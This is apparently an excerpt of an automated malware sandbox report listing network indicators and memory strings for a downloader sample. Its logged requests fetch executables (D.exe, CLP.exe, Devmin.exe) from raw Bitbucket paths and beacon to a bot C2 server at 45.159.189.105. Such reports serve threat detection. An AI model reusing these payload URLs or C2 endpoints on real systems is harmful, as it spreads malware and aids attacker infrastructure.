bitbucket.org; object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BC0000.00000004.00000800.00020000.00000000.sdmp String found in memory: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp String found in memory: Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com statsigapi.net fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--prod-east--bitbucketci-file-service--files.s3.amazonaws.com micros--stg-west--bitbucketci-file-service--files.s3.us-west-1.amazonaws.com micros--stg-east--bitbucketci-file-service--files.s3.amazonaws.com micros--ddev-west--bitbucketci-file-service--files.s3.ap-southeast-2.amazonaws.com bqlf8qjztdtr.statuspage.io https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: global traffic HTTP traffic detected: GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 45.159.189.105 45.159.189.105
Source: Joe Sandbox View IP Address: 185.166.143.49 185.166.143.49
Source: Joe Sandbox View ASN Name: HOSTING-SOLUTIONSUS HOSTING-SOLUTIONSUS
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49739 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50007 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50008 -> 45.159.189.105:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 185.166.143.49:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 185.166.143.49:443
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown TCP traffic detected without corresponding DNS query: 45.159.189.105
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /5940jg9834/gf3443f3/raw/0adfaef4f847a17ea4e4f656dcd85e76293780ed/D.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/CLP.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /recheatsorg/recheatsdirect/raw/00eb2d0b436591fce1153baca762509e762f2ce4/Devmin.exe HTTP/1.1Host: bitbucket.org
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/regex HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bot/online?guid=724471\\user&key=5ef1aac7b3430729f6cbc95fb4d2d2a62582e7382955ffc87026077cb28ab31e HTTP/1.1Host: 45.159.189.105Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: bitbucket.org
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/bot/online?guid=724471
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001165000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.000000000110D000.00000004.00000020.00020000.00000000.sdmp, svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/bot/regex
Source: svcupdater.exe, 00000023.00000002.2994296261.0000000001152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://45.159.189.105/bot/regexystem32
Source: powershell.exe, 00000001.00000002.1828229655.000001EC31BD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1828229655.000001EC31B1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bitbucket.org
Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000028.00000002.2588137251.000001C536E3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFCB5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000002C.00000002.2966233534.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C0200000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000001.00000002.1925142827.000001EC40A84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512EA28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1787181192.000002512E8E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002512014C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2140674795.00000270C7706000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2339760412.00000000041A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2555004791.000001C52E911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F844000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223864605.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2963978319.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000002C.00000000.2225392956.00000202C043D000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224168182.00000202C024B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2966233534.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2972274642.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000036.00000000.2312885575.00000241A96E0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223723010.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2962436516.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30C39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B78B8000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000002C.00000000.2223657807.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2961818785.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000003.00000002.1768225702.000002511FF03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51F372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000028.00000002.2246120062.000001C51F62A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000002C.00000002.2975316447.00000202C0400000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2225232063.00000202C0400000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: lsass.exe, 0000002C.00000003.2253659428.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224956788.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000000.2224716496.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000002C.00000002.2973571335.00000202C0390000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000001.00000002.1960407447.000001EC48E3D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.t.com/pkiops/cersoft%20Time-Stam202010(1).crt0
Source: powershell.exe, 00000001.00000002.1828229655.000001EC30A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1768225702.000002511E871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2039902997.00000270B7691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2246120062.000001C51E8A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000026.00000002.2228353344.0000000003141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
